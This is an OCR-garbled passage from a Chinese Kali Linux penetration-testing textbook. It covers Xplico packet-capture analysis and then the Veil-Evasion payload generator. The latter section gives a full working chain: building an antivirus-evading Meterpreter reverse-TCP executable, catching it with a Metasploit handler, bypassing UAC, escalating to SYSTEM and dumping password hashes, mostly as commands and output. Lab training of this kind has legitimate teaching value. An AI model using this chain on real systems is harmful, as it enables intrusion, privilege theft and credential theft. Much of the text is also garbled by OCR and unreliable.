| | Xplico ..:Pols:.. | | 


P | @ localhost | vE [iw ji a ha "a 


ES Most Visitedw [Offensive Security “A Kali Linux "& Kali Docs [Exploit-D8 W Aircrack-ng 



















Aplico Interface 


The Case has been created 





Cases List b 
Name External Reference Type Actions 


Test Files Delete 


~ 





6.23 新 建 的 案例 


(5) 在 该 界面 的 案例 列表 中 显示 了 新 建 的 案例 。 此 时 单 击 Test， 查 看 案例 中 的 会 
话 ， 如 图 6.24 所 示 。 


Xplico ..:Sols:.. = Iceweasel 
File Edit View History Bookmarks Tools Help 
I Xplico ..:Sols:. ke | 
“ga | & localhost ex vei. je aj i "P 


Ez Most Visited [JOffensive Security ™ Kali Linux ™ Kali Docs QJExploit-DB W Aircrack-ng 





Xplico Interface 
List of listening sessions of case: Test 
Name start Time End Time status Actions 











图 6.24 监听 的 会 话 


(6) 从 该 界面 可 以 看 到 没有 任何 会 话 信息 ， 接 下 来 创建 会 话 。 单 击 左 侧 栏 中 的 
New Session 命 分 ， 将 显示 如 图 6.25 所 示 的 界面 。 








Xplico ..:Sols;.. = lceweasel 
File Edi View History Bookmarks Tools Help 
IC Xplico ..:Sols:.. LJ 
E (GixmnestsszonssaM Eee AGA 


Ez Most Visited" Offensive Security "& Kali Linux ™ Kali Docs KfiExploit-DB W Aircrack-ng 






New listening session 








Session name Windows XP targe 
Create k 


| > 
图 6.25 新 建 会 话 


(7) 在 该 界面 Session name 对 应 的 文本 框 中 输入 想 创 建 的 会 话 名 ， 然 后 单 击 
Create 按 和 钮 ， 将 显示 如 图 6.26 所 示 的 界面 。 


























Xplico ..:Sols:.. = lceweasel "NR. | 
File Edt View History Bookmarks Tools Help 
| Xplico ..:Sols:.. LJ | 


B Most Visited’ [Offensive Security “A Kali Linux "& Kali Docs KllExploit-DB  WAircrack-ng 










Xplico Interface 





The Session has been created 
List of listening sessions of case: Test 


Name Start Time End Time Status Actlons 
Windows 2Ptarget 0000-00-00 QO0:00:00 0000-00-00 O0:0O0:00 EMPTY 














图 6.26 新 建 的 会 话 


(8) 从 该 界面 可 以 看 到 新 建 了 一 个 名 为 Windows XP Target 的 会 话 。 此 时 进入 该 会 
话 中 ， 束 可 以 加 载 pcap 文 件 解析 分 析 了 。 单 击 会 话 名 WindowsXPtarget， 将 显示 如 
图 6.27 所 示 的 界面 。 


Xplico ..:Sols:.. = lceweasel = |0] 
File Edit View History Bookmarks Tools Help 
| C Xplico ..:Sols:.. | 
€ (Gixamess7esasween OE 0 


B Most Visited Offensive Security “A Kali Linux “A Kali Docs 人 Exploit-DB W Aircrack-ng 









Case and Session 


name Test -> Windows XPtarget 
Cap. Start Time 0000-00-00 00:00:00 
Cap. End Time 0000-00-00 00:00:00 


ML 


— Status EMPTY 
Hosts z 





© Chat Post g Number oO Received o Total ü 
‘© Shel t 0 Contents o Sent o UMP Raoslvad0 
Undecaoded Video 0 Video 0 Unreadedo 0 cwnioadado Sent ü | 
images oO images oO Uploadedo - 0 vj 


ze mm e 





图 6.27 上 传 pcap 文 件 


(9) 该 界面 是 用 来 显示 pcap 文 件 详细 信息 的 。 目 前 还 没有 上 传 任何 pcap 文 件 ， 所 
以 单 击 Browse 按 钮 选择 要 解析 的 捕获 文件 。 然 后 单 击 Upload 按 钮 ， 将 显示 如 图 
6.28 所 示 的 界面 。 


2 
Xplico Sols. = ceweasel 


File Edit View History Bookmarks Tools Help 
| Connecting... | 
“a i | db localhost 3876/sol s/viewi: ^ «$i [ v Ge ie a x e 


B Most Visited" [Offensive Security "& Kali Linux '& Kali Docs WExploit-DB WAircrack-nq 















Xplico Interfac | 
(Seno — 0 0 O | 
Case and Session name Test -> Windows TTaget PCAP-over-IP TCP port: 30002. 
Cap. Start Time 2014-07-03 14:11:43 Add new pcap file. 
| Cap. End Time 2014-07-03 14:12:08 : 
o Graphs z tatus DECODING COMPLETED Browse... | No file selected. 
"—— COSTS ^ Upload l 
Filtër List of all pcap files. k 
© Chat Number ü Received 0 Total 0 
CE Contents 0 Sent ü Connections- 0 Received O 
| © Undecoded Video — 0 Unreaded 0/0 Downloadan 0 Sent 0 
HTTP g 
Server — 0 DNS res 2 Video 0 Groups oO 
Channels 0/0/0 ARP / ICM Pe 0 Audio 0 Articles © 


Waiting for Localhost.. 
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6.28 成 功 上 传 了 捕获 文件 


(10) 从 该 界面 可 以 看 到 pcap 文 件 分 为 几 个 部 分 。 关 于 pcap 文 件 的 每 类 型 效 所 
包 ， 可 以 对 应 的 查看 。 该 界面 显示 了 10 种 类 型 ， 如 HTTP、MMS、Emails、FTP- 
TFTP-HTTP fle 和 Web Mail 等 。 在 该 界面 单 击 左 侧 栏 中 的 Web 并 选择 Site 命 分， 将 
显示 如 图 6.29 所 示 的 界面 。 


Xplico Webs: = Iceweasel AE 
File Edt View History Bookmarks Tools Help 
| C Xplico ..Webs... | | 
bal | & localhost B7T6webs E: ~e [ ii a vm 
























































B Most Visited" illoffensive Security “Kali Linux & Kali Docs BExplat-D8 W Aircrack-ng 


| 了 


For a complete view of html page set your browser to use Proxy, and point it to 





eo case 
r3 Graphs Web server. 
Web URLs: Html G image O Flash Video O Audio (O J80N 
Search: C^ AM 
Go 
Date Url Size Method info 
2014-07-17 16:14-5-6 image .Saidu.com/data/imginfot picture _id= 104876412 168colun 981 GET — info.armil 
4014-07-17 15:14-50image.baildu.com/data/ImginTo?picbure id-104BTT38245JAo0lumn aT? GET Info. amil 
2014-07-17 16:14:46 image.baidu.com/datia/Imginfo?picbare ida121565380164&colun B1 GET Info. arl 
EU =a 2014-07-17 16:14:42 image baldas. com/data/Imginta?picture id"1048784862354colum 9a5 GET — infa. xrmi 
ndecoded z0214 TL? 16:14:37 wmois.pcaoanlime.com.con/'iplsoan.jspcallbackecmta gabira Buk 18562 GET Info. aml 
2074-07-17 16:24 507 poe baldu.com/ecom?cecegh2312&daiv 1 detve Bbcpaen d &calszh- AA8243 GET hate ami 
ZD14-DT.1T 18:14:38 Bdz5ra v.admasbar.com.en/l/a20810,5200450151,022839,/0,.m: ü GET infa. aml 
Z034-DT-17T 16:14-40 stat. na. rds com; 7actianscm&srcaKdmaster&uidas 14D 73 705893134 a GET nfo are! 
2014-07-17 18:14:30 www bal du.com/ur/acun?titila" XESXROXOGOWIn TRES RATER INET 2507 GET — infa. xmi 
ZD14-DT. 1T 16:24:96 cmt pcanline.cam.cn entry japZurlshEpW34A/ ^wallpaper.pooniina. 20382 GET Info. are! 
2074-07-17 180:14-358 wallpaper.peanline.com.en/nic/ 3604 html 288RT GET infa. ami 
Pa 18:13:5Bimage.baidu.cem/data/lemginTo?picbare ld 104B8TBOS9430Acolun GTi ET late arl 
z0214-D7.17 16:13:47 Image.baldu.cam/datiall/newindex?conls &ES NAJAL BET SEBARBS B1iB55 GET Infa.xrml 
2014-07-17 16:13:44 image baidu. sem /channal/getplcintoTidiiat»12156538018X2C1 431 GET — lnfe.xrmi 
ZD14.DT.1T 15:13-43image.baidu.com, channel li stjsonTpneOAmesz4Atagles XESTYA3N T191 GET Info. arm 
2014-DT-1T 16:23:41 image baidu com channel ^wallpager 2T144 GET infa. ami 


图 6.29 显示 了 捕获 文件 中 的 站 点 


(11) 该 界面 显示 了 捕获 文件 中 所 有 访问 的 站 点 ， 从 该 界面 的 底部 可 以 看 到 共有 8 
页 信息 。 在 该 界面 也 可 以 进行 搜索 。 例 如 搜索 baidu， 将 显示 如 图 6.30 所 示 的 界面 。 
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|B Most Visited [Offensive Security "& Kali Linux “A Kali Docs KfilExpioit-DB W Aircrack-ng 





For a complete view of html page set your browser to use Proxy, and ] 
point it to Web server. 


Web URLs: © Html image CO Flash Video O Audio 
O JSON All 





Search: baidu Go 
Date Url Sire Method Info 

UCET 2014-07-17 16:14:56 image baldu.com/data/imginfa?picture ide10487841 981 GET — info.xmi 
I-E 2014.07.17 16:14:50 image.baldu_com/data/imginiotpicture_ide10487 752 972 GET inta .xml 
® chal 2014-07-17 16:14:46 image.baldu.com/data/imginio?picture_id=12156638 981 GET — info.xmi 
EET | 2014-07-17 18:14:42image.baldu.com/data/imginfo?picture id» 104B8784€ 985 GET = info.xmi 
CETE) 2014-07-17 16:14:37 pos baldu.com/ecom?cecuegb23128dai-1&chve&&cpa 38243 GET ^ info.xmi 
nhance 2014-07 27 16:34:36 www.haldu.com,ur/scun?tities &E3& BOX BOWIn7 BESS 2507 GET infa. xmi 
2014-07-17 18:14:38 cmt. peonlina.com.cn/entry JapTuriwhttp'6 3A / /wallpapi 20392 GET — info.xmi 

2014-07-17 18:13:58 image balde.com/data/imginio?picture_id= 10487805 971 GET — info.xmi 

2014-07-17 16:13:47 i mage.baldu.com/detnil /newindex?tcola KERNAJ NAI i B18668 GET infa .xmi 

2014-07-17 16:13:44 image.baldu.com/channel /getpicinfo?idiist= 1215652 434 GET — info.xmi 

2014-07-17 186:13:43image.baldu.com/channal /list]son?7pne 0m» 24 Atagi 7191 GET — info.xmi 

2014-07-17 16:13:41]! mmge.baldu.com;channe! wallpaper JZT144 GET Info .xmi 

2014-07-17 16:13:36 image.baldu.com/ 40967 GET — info.xmi 

2014-07-17 16:13:33 wew.baldu.com/ 15075 GET — info.xmi 

2014-07-17 18:13:19 pos. baldu.com/ecom?caceutt-B&dale 5&ctye B bcprel: 40507 GET — info.xmi 


Fa a We ee We eh a 42826 GET info. mmi 


a] 


图 6.30 搜索 结果 


(12) 从 该 界面 可 以 看 到 ， 搜 索 的 结果 共有 3 页 。 如 果 想 查看 目标 系统 访问 过 的 图 
片 ， 单 击 左 侧 栏 中 的 Image 选 项 ， 将 显示 如 图 6.31 所 示 的 界面 。 


6.4 Sankt oA 266 


大 学 霸 Kali Linux 安全 渗透 教程 


Xplico ...Webs:.. - Iceweasel — | 

File Edit View History Bookmarks Tools Help 
| KC Xplico ..-Webs... | | | 
CIPTTTTITTTTTTTA —— -eJ[ "c AOS 


圈 Most Visited" offensive Security “A Kali Linux '& Kali Docs KfiExploit-DB. W Aircrack-ng 











Aplico | 





Ø Case 
o Graphs 


ver 


Search: Go 























Ti phil os aide com d.highaobos.baidu.bom h.hephatos 5aidu.oom c Fuphaotos baidu. com 


© Mail image or Page image or Page image or Page image or Page 


iii! Sad 






© Voip 

© Share 
CETNEB 
| © Undecoded 


Kenhance 





| | : 
Oreo Bae cen e honnaotros Fait oom imga IT LE 
Image or Page Image or Page image or Page Image or Page 








| 4 
C Pops Bethy ci imgatan Edu oom Poste tea Barly. oorr ü Fuphigtos Diu oorr 
image or Page Image or Page image or Page image or Page 
| 
| 
| r d 
e 
Ls B 








图 6.31 访问 的 图 片 
(13) 从 该 界面 可 以 看 到 目标 系统 访问 过 的 所 有 图 片 信息 。 
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6.5 锡 杀 Payload 生 成 工具 Veil 


Veil 是 一 Mo & 生 成 相 兼 容 的 Payload 工 具 ， 并 且 在 大 多 数 网 络 环境 
中 能 绕 过 靖 见 的 杀毒 软件 。 本 节 将 介绍 Veil 工 具 的 安 疼 及 使 用 。 


在 Kali Linux 中 ， 默 认 没 有 安 委 Veil 工 具 。 这 里 首先 安 季 Veil 工 具 ， 执 行 如 下 所 示 的 


AA. 
pp 


root@kali:~# apt-get install veil 


执行 以 上 命 爷 后 ， 如 果 安 装 过 程 没有 提示 错误 的 话 ， ia 法 成 功 。 由 
于 安 久 该 工具 依赖 的 软件 较 多 ， 所 以 此 过 THEN AARK 


启动 Veil 工 具 。 执 行 命 分 如 下 所 示 : 


root@kali:~# veil-evasion 


Veil-Evasion Setup Script | [Updated]: 01.15.2015 


[Web]: https://www.veil-framework.com | [Twitter]: @VeilFramework 


] Initializing Apt Dependencies Installation 
] Adding 1386 Architecture To x86 64 System 
] Updating Apt Package Lists 
命中 http://mirrors.ustc.edu.cn kali Release.gpg 

rH http://mirrors.ustc.edu.cn kali/updates Release.gpg 
命中 http://mirrors.ustc.edu.cn kali Release 
命中 http://mirrors.ustc.edu.cn kali/updates Release 
命中 http://mirrors.ustc.edu.cn kali/main Sources 
命中 http://mirrors.ustc.edu.cn kali/non-free Sources 
命中 http://mirrors.ustc.edu.cn kali/contrib Sources 
命中 http://mirrors.ustc.edu.cn kali/main amd64 Packages 
命中 http://mirrors.ustc.edu.cn kali/non-free amd64 Packages 
命中 http://mirrors.ustc.edu.cn kali/contrib amd64 Packages 
获取 :1 http://mirrors.ustc.edu.cn kali/main i386 Packages [8,474 kt 
命中 http://http.kali.org kali Release.gpg 
命中 http://security.kali.org kali/updates Release.gpg 
命中 http://http.kali.org kali Release 


忽略 http://http.kali.org kali/non-free Translation-en 


FA 17.8 MB， 耗 时 20 秒 (859 kB/s) 
正在 读 取 软 件 包 列表 完成 
[^] Installing Wine 1386 Binaries 
正在 读 取 软 件 包 列表 完成 
正在 分 析 软 件 包 的 依赖 天 系 树 
正在 读 取 状态 信息 ... 完成 
RE SERE FARBE : 
gcc-4.7-base:i1386 libasound2:1386 libc-bin libc-dev-bin libc6 lib: 
libc6-dev libc6-1686:1386 libdbus-1-3:1386 libdrm-intel1:1386 
libdrm-nouveauia:1386 libdrm-radeoni:1386 libdrm2:1386 libexpat1i:: 
libffi5:1386 libfontconfigi1:1386 libfreetype6:1386 libgcc1:1386 
[^] Cleaning Up Setup Files 
[^] Updating Veil-Framework Configuration 
Veil-Framework configuration: 
[*] OPERATING SYSTEM - Kali 
] TERMINAL CLEAR = clear 
] TEMP. DIR = /tmp/ 
] MSFVENOM OPTIONS = 
] METASPLOIT PATH - /usr/share/metasploit-framework/ 
] PYINSTALLER PATH - /usr/share/pyinstaller/ 
VEIL EVASION PATH - /usr/share/veil-evasion/ 
PAYLOAD SOURCE PATH - /root/veil-output/source/ 
Path '/root/veil-output/source/' Created 
PAYLOAD COMPILED PATH - /root/veil-output/compiled/ 
Path '/root/veil-output/compiled/' Created 
Path '/root/veil-output/handlers/' Created 
GENERATE HANDLER SCRIPT - True 
HANDLER PATH - /root/veil-output/handlers/ 
HASH LIST - /root/veil-output/hashes.txt 
[^] VEIL CATAPULT PATH = /usr/share/Veil-Catapult/ 
[^] Path '/root/veil-output/catapult/' Created 
[*] CATAPULT RESOURCE PATH = /root/veil-output/catapult/ 
[^] Path '/etc/veil/' Created 
Configuration File Written To '/etc/veil/settings.py' 


en" 
ma Le! Ue) |! e eee!) ee!) eee * ma e UR ee! 
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以 上 信息 只 有 在 第 一 次 运行 Veil 时 才 显 示 。 在 此 过 程 中 ， 初 始 化 一 些 脚 本、 软件 乌 
列表 、 更 新 配置 及 安 疼 需 要 的 软件 包 。 在 此 过 程 中 以 图 形 界 面 的 形式 依次 安 疼 了 
Python 及 它 的 两 个 模块 pywin32-218 和 pycrypto-2.6。 下 面 依次 进行 安装 。 首 先 弹 出 
的 对 话 框 ， 如 图 6.32 所 示 。 
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Python 2.7.5 Setup 








216.32 Python 初始 界面 


该 界面 是 安 湾 Python 的 初始 界面 。 这 里 使 用 默认 设置 ， 单 击 Next 按 钮 ， 将 显示 如 图 
6.33 所 示 的 界面 。 
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Python 2.7.5 Setup 





图 6.33 选择 Python 安装 位 置 


在 该 界面 单 击 Next 按 钮 ， 将 显示 如 图 6.34 所 示 的 界面 。 该 界面 提示 C:\Python27 已 
存在 ， 确 认 是 否 要 罗兰 已 存在 的 文件 。 这 里 单 击 Yes 按 钮 ， 将 显示 如 图 6.35 所 示 的 
界面 。 
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图 6.34 确认 Python 的 安装 位 置 
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图 6.35 BE x Python 


FAA BEL B3ePythonsy—LRe. ix PRAEAN E, Xd NextiEém, TS 
显示 如 图 6.36 所 示 的 界面 。 
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python 
windows 





图 6.36 安装 完成 
该 界面 提示 Python 已 经 安装 完成 。 此 时 单 击 Finish 按 钮 ， 将 显示 如 图 6.37 所 示 的 界 


Oo 


PYTHON 


Powered 
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图 6.37 安装 pywin32-218 模 块 界 面 


该 界面 是 要 求 安装 pywin32-218 模 块 。 这 里 单 击 “ 下 一 步 " 按 和 钮 ， 将 显示 如 图 6.38 所 示 
的 界面 。 





Setup 


Python 2.7 is required for this package. Select installation to use: 








Puthon Veron 2.7 hound m raain] 





PYTHON 
Powered 





Python Directony [E Puthon2 
Installahon Directory [C MPythonz7Libsite-pack ages 


< E— PB) 





图 6.38 设置 向 导 
这 里 使 用 默认 设置 ， 单 击 “ 下 一 步 " 按 和 钮 ， 将 显示 如 图 6.39 所 示 的 界面 。 


Setup 


Click Het to begin the installation of puranZ. If you want to review or change 
ary of your inztallabon setings, click Back Chick Cancel to exi the vazand 








PYTHON 
Powered 


Ready to install 





图 6.39 准备 安装 


该 界面 用 来 确实 是 否 要 开始 安 禾 。 如 果 人 确认 配置 正确 的 话 ， 单 击 " 下 一 步 " 按 钮 ， 将 
显示 如 图 6.40 所 示 的 界面 。 


r 


Setup 


Postinetall script finished. 
Chek the Finish button to eat the Setup wizard. 





ener as eigner ee a rtr system3XZputhoncomz? dii = 





PYTHON 
Powered > | 
> Software PuylonP a2 AH Pahon R Reterence[None}=1 
Pythonin has been registered in context menu 
Creating directory C^ PALibNute-packages wan 32com'uen, py 
Can't install E LM wusensPublic Stat Menus Programs Pythons 
The pan de extensions were successfully nstalled 

















图 6.40 BARS 


从 该 界面 可 以 看 到 pywin32-218 模 块 已 经 安 闻 完成 。 此 时 单 击 " 结 束 " 搜 钮 ， 将 显示 如 
图 6.41 所 示 的 界面 。 


Setup 


This Wiad vell install pycrypto on your computer. Click Mest to continue or 
Cancel to exit the Setup Wizard. 





ie Cryptographic sue hor Pythian 
eme: pycrypto 

PYTHON Lik itp / veeree pycryplo orgy 
Powered Version: 2.6 





ia 


Bult Thu Sep 27 20:30:11 2012 wath dstutis-2 7.3 





图 6.41 安装 pycrypto-2.6 模 块 初始 界面 


该 界面 提示 需要 安 玫 pycrypto-2.6 模 块 。 这 里 单 击 “下 一 步 " 按 钮 开始 安 又 ， 如 图 6.42 
所 示 。 


setup 





Python 2.7 is required for thes package. Select inctallahon to use: 





| power'ed 





Python Directory [EAP 00 


Installation Directory [C:\Python??\Lib\ste-packages' 








< 上 一 步 且 取消 


图 6.42 设置 向 导 
这 里 使 用 默认 设置 ， 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 图 6.43 所 示 的 界面 。 


Setup 


Click Next to begin the installation of pycrypto. If you veant to review or change 
ary of your instalation settings, click Back. Chek Cancel to eit the wazard 


PYTHON 


Powered 


Ready bo install 




















图 6.43 准备 安装 


该 界面 提示 将 要 安装 pycrypto 模 块 。 这 里 单 击 “下 一 步 ” 按 钮 ， 将 显示 如 图 6.44 所 示 的 
界面 。 


setup 





Click the Finish button to exit the Setup wizard. 








Ea 





图 6.44 安装 完成 


从 该 界面 可 以 看 到 以 上 坎 件 包 已 安 疼 完成 。 此 时 单 击 “结束 ?按钮 ， 将 显示 如 下 所 示 
的 信息 


Veil-Evasion | [Version]: 2.4.3 


[Web]: https://www.veil-framework.com/ | [Twitter]: QVeilFrameworl 


Main Menu 
24 payloads loaded 
Available commands: 


use use a specific payload 

info information on a specific payload 
list list available payloads 

update update Veil to the latest version 
clean clean out payload folders 

checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


[^] Please enter a command: 
Aoo ë 


从 以 上 信息 中 可 以 看 到 在 Veil 下 ， 有 24 个 攻击 载 倚 可 加 载 ， 并 列 出 了 可 用 的 命 爷 。 
现在 束 可 以 进行 各 种 操作 了 。 例 如 查看 可 加 载 的 攻击 模块 ， 执 行 命 分 如 下 所 示 : 


[>] Please enter a command: list 


[Web]: https://www.veil-framework.com/ | [Twitter]: QVeilFrameworl 


[*] Available payloads: 
1) c/meterpreter/rev tcp 
2) c/meterpreter/rev tcp service 
3) c/shellcode inject/virtual 
4) c/shellcode inject/void 
5) cs/meterpreter/rev tcp 
6) cs/shellcode inject/base64 substitution 
7) cs/shellcode inject/virtual 
8) native/Hyperion 
9) native/backdoor factory 
10) native/pe scrambler 
11) powershell/shellcode inject/download virtual 
12) powershell/shellcode inject/psexec virtual 
13) powershell/shellcode inject/virtual 
14) python/meterpreter/rev http 
15) python/meterpreter/rev http contained 
16) python/meterpreter/rev https 
17) python/meterpreter/rev https contained 
18) python/meterpreter/rev tcp 
19) python/shellcode inject/aes encrypt 
20) python/shellcode inject/arc encrypt 
21) python/shellcode inject/base64 substitution 
22) python/shellcode inject/des encrypt 
23) python/shellcode inject/flat 
24) python/shellcode inject/letter substitution 


Le 


从 输出 的 信息 中 ， 可 以 看 到 有 24 个 可 用 的 攻击 载 何 。 此 时 可 以 利用 任何 一 个 攻击 载 
何 ， 进 行 渗透 攻击 。 


【实例 6-5】 演示 使 用 Veil 工 具 中 的 载 何 (本 例 以 cs/meterpreter/rev_tcp 为 例 ) , st 
行 渗透 攻击 (这 里 以 Windows 7 作为 攻击 靶 机 ) 。 具 体操 作 步 又 如 下 所 示 。 


(1) 扰动 Veil 工 具 。 执 行 命 分 如 下 所 示 : 


root@kali:~# veil-evasion 


HUTA Esp, FETU RPA : 


[Web]: https://www.veil-framework.com/ | [Twitter]: QVeilFrameworl 


Main Menu 
24 payloads loaded 
Available commands: 


use use a specific payload 

info information on a specific payload 
list list available payloads 

update update Veil to the latest version 
clean Clean out payload folders 

checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


[>] Please enter a command: 
i 0 00 0 ERI 


在 输出 的 信息 中 看 到 [>] Please enter a command: 提 示 符 ， 就 表示 Veil 登 录 成 功 
fe 


(2) 选择 cs/meterpreterrev tcp 攻 击 载荷 。 在 攻击 载荷 列表 中 ， 
cs/meterpreter/rev _tcp 载 傈 的 编号 是 5。 执 行 命令 如 下 所 示 : 


[>] Please enter a command: use 5 


[Web]: https://www.veil-framework.com/ | [Twitter]: QVeilFrameworl 


Payload: cs/meterpreter/rev tcp loaded 
Required Options: 


Name Current Value Description 
LHOST IP of the metasploit handler 
LPORT 4444 Port of the metasploit handler 
compile to exe Y Compile to an executable 
Available commands: 
set set a specific option value 
info show information about the payload 
generate generate payload 
back go to the main menu 
exit exit Veil 


[^] Please enter a command: 
b EE 


输出 信息 显示 了 rev _ tcp 攻击 载荷 可 配置 的 选项 参数 。 这 里 默认 指定 的 本 地 端口 
(LPORT) 是 4444，LHOST 选 项 还 没有 配置 。 


(3) 配置 LHOST 选 项 参数 ， 并 查看 攻击 载 傈 的 详细 信息 。 执 行 命 人 如 下 所 示 : 


[>] Please enter a command: set LHOST 192.168.6.103 
[>] Please enter a command: info 


Veil-Evasion | [Version]: 2.4.3 


[Web]: https://www.veil-framework.com/ | [Twitter]: QVeilFrameworl 


Payload information: 


Name : cs/meterpreter/rev tcp 
Language: CS 
Rating: Excellent 


Description: pure windows/meterpreter/reverse tcp stager, no she 
Required Options: 


Name Current Value Description 
LHOST 192.168.6.100 IP of the metasploit handler 
LPORT 4444 Port of the metasploit handler 
compile to exe Y Compile to an executable 





Ei 


从 输出 的 信息 中 ， 可 以 看 到 rev_tcp 攻 击 载 何 的 详细 信息 ， 如 攻击 载 何 名 、 语 计 、 级 
别 及 配置 的 选项 参数 等 。 


(4) 此 时 ， 使 用 generate 命 仿生 成 载 傈 文件 。 执 行 命 令 如 下 所 示 : 


[>] Please enter a command: generate 


Veil-Evasion | [Version]: 2.4.3 


[Web]: https://www.veil-framework.com/ | [Twitter]: QVeilFrameworl 


[*] Press [enter] for 'payload' 
[>] Please enter the base name for output files: backup  # 指 定 输出 》 


- ——À 
在 以 上 命令 中 指定 一 个 文件 名 为 backup。 然 后 按 下 回 车 键 ， 将 显示 如 下 所 示 的 信 


JUN =" 





[^] Executable written to: /root/veil-output/compiled/backup.exe 


Language: CS 

Payload: cs/meterpreter/rev tcp 

Required Options: LHOST=192.168.6.103 LPORT-4444 compile to exe: 
Payload File: /root/veil-output/source/backup.cs 

Handler File: /root/veil-output/handlers/backup handler.rc 


[^] Your payload files have been generated, don't get caught! 
[!] And don't submit samples to any online scanner! ;) 
[^] press any key to return to the main menu: 


A] 


从 输出 的 信息 中 可 以 看 到 生成 一 个 可 执行 文件 backup.exe， 并 且 该 文件 保存 
在 /root/veil-output/compiled/ 中 。 此 时 将 可 执行 文件 backup.exe 发 送 到 目标 主机 
上 ， 融 可 以 利用 该 攻击 载 何 了 。 


接 下 来 需 要 使 用 Metasploit 创 建 一 远程 处理 器 ， 等 竺 目标 主机 连接 到 Kali 
Linux (攻击 主机 ) 操作 系统 。 连 接 成 功 后 ， 融 获取 到 一 个 远程 Shell 命 今 。 


【实例 6-6】 创建 远程 处 理 器 。 具 体操 作 步 骤 如 下 所 示 。 
(1) 启动 MSF 终端 。 
(2) 使 用 handler 模 块 。 执 行 命令 如 下 所 示 : 


msf > use exploit/multi/handler 


(3) 加 载 reverse_tcp 攻 击 载荷 ， 并 设置 其 选项 参数 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp 

msf exploit(handler) > set LHOST 192.168.6.103 

LHOST => 192.168.6.103 


Aoo Og 
(4) 和 启动 渗透 攻击 。 执 行 合 信 如 下 所 示 : 
msf exploit(handler) > exploit 


[*] Started reverse handler on 192.168.6.103:4444 
[*] Starting the payload handler... 


从 输出 信息 可 以 看 到 攻击 载 何 已 启动 ， 正 在 等 竺 连接 目标 主机 。 


此 时 将 前 面 生 成 的 可 执行 文件 backup.exe 发 送 到 目标 主机 (Windows 7) ， 并 运行 
该 可 执行 文件 。 然 后 返回 到 Kali Linux 操 作 系 统 ， 将 看 到 如 下 所 示 的 信息 : 


[*] Sending stage (769536 bytes) to 192.168.6.110 
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.: 
meterpreter > 


从 以 上 信息 中 ， 可 以 看 到 成 功 打 开 了 一 个 Meterpreter 会 话 。 这 表示 已 成 功 渗透 攻击 
目标 主机 ， 现 在 束 可 以 进行 一 些 Shell 命 爷 。 如 进行 目标 主机 的 Shell 环 境 ， 执 行 命 
人 如 下 所 示 : 





meterpreter > shell 

Process 1544 created. 

Channel 1 created. 

Microsoft Windows [版 本 6.1.7601] 


(c) 2009 Microsoft Corporation 
C:\Users\lyw\Desktop> 


输出 的 信息 表示 进入 了 目标 系统 Windows 7 的 命令 行 ， 并 且 当 前 目标 系统 登录 的 用 
户 定 |yw。 


如 果 以 上 用 户 ; RA Aiea ie 可 以 使 用 Metasploit 中 的 bypassuac 模 块 绕 


UAC (用 户 访问 控制 ) ， 进 而 提升 用 户 的 权限 。 下 面 将 介绍 使 用 o NE 
升 以 上 lyw 用 户 的 权限 。 


(1) 将 Meterpreter 会 话 ， 调 用 到 后 台 运 行 。 执 行 命令 如 下 所 示 : 


meterpreter > background 
[*] Backgrounding session 1... 


从 输出 的 信息 中 ， 可 以 看 到 当前 后 台 运 行 的 会 话 编号 是 1。 该 会 话 编号 需要 记 住 ， 
在 后 面料 会 用 到 。 


(2) 查看 会 话 详 细 信 息 。 执行 丁 命 SO PHI : à 


msf exploit(handler) > sessions 


Active sessions 
Id Wp Information Connection 
1 — x86/win32 WIN- RKPKQFBLG6C\bob @ WIN-RKPKOFBLG6C 


192.168.6.103:4444 -> 192.168.6.106:49199 (192.168.6.106) 


从 输出 信息 中 可 以 看 到 该 会 话 中 ， 连 接 到 目标 系统 的 运行 架构 、 计 算 机 名 及 IP 地 
址 。 


(3) 使 用 bypassuac 模 块 ， 并 查看 可 配置 的 选项 参数 。 执 行 命 令 如 下 所 示 : 


msf exploit(handler) > use exploit/windows/local/bypassuac 
msf exploit(bypassuac) > show options 
Module options (exploit/windows/local/bypassuac ): 


Name Current Send eel Description 

SESSION yes The session to run this module on. 
Payload options (windows/meterpreter/reverse tcp): 

Name Current Setting Required Description 

EXITFUNC process yes Exit technique (accepted: seh, thread, process, 
none) 

LHOST 192.168.6.103 yes The listen address 

LPORT d444 yes The listen port 
Exploit target: 

Id Name 


0 Win dows x86 


从 输出 信息 中 ， 可 以 看 到 模块 选项 中 有 一 个 可 配置 的 选项 参数 SESSION。 该 选项 
的 值 ， 融 是 当前 后 台 运 行 的 会 话 编号 。 


(4) 设置 SESSION 选项 参数 。 如 下 所 示 : 


msf exploit(bypassuac) > set session 1 
session => 1 


(5) 和 启动 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf exploit(bypassuac) > exploit 

[^] Started reverse handler on 192.168.6.103:4444 

[^] UAC is Enabled, checking level... 

[+] UAC is set to Default 

[+] BypassUAC can bypass this setting, continuing... 

[+] Part of Administrators group! Continuing... 

[^] Uploaded the agent to the filesystem... 

] Uploading the bypass UAC executable to the filesystem... 

] Meterpreter stager executable 73802 bytes long being uploaded. 
] Sending stage (769536 bytes) to 192.168.6.106 

] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.: 
eterpreter » 





从 输出 的 信息 中 ， 可 以 看 到 目前 登录 的 用 户 实际 上 是 属于 管理 组 的 成 员 ， 并 且 绕 过 
了 UAC 创 建 了 一 个 新 的 会 Ire 此 时 融 可 以 提升 用 户 的 权限 了 。 
(6) 查看 lyw 用 户 的 信息 。 执 行 命 分 如 下 所 示 : 


meterpreter > getuid 
Server username: WIN-RKPKQFBLGG6CNlyw 


从 输出 信息 中 可 以 看 到 该 用 户 只 是 WIN-RKPKQFBLG6C 计 算 机 中 的 一 个 普通 用 
Fe 
(7) 提升 lyw 用 户 的 权限 ， 并 查看 其 用 户 信 息 。 执 行 命 分 如 下 所 示 : 


meterpreter > getsystem 

„got system (via technique 1). 
meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 


从 输 出 信息 中 可 以 看 到 当前 |yw 用 户 ， 拥有 了 系统 级 别 的 权限 。 此 时 ， 可 以 进行 任 
何 的 操作 。 如 捕获 目标 系统 中 ， 用 户 的 密码 哈 硕 值 。 执 行 命令 如 下 所 示 : 


meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key... 

